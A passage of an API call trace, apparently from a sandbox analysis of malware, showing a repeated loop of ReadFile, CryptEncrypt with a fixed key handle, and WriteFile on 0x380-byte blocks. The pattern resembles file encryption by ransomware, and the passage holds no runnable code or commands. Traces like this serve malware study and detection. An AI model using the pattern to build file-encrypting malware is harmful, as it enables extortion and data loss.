pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.630] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.630] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.630] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.630] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.631] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.631] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.631] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.631] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.631] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.631] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.632] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.632] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.632] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.632] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.632] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.632] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.632] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.633] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.633] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.633] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.633] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.633] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.633] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.634] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.634] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.634] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.634] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.634] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.634] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.634] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.635] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.635] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.635] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.635] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.635] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.635] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.635] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.636] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.636] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, 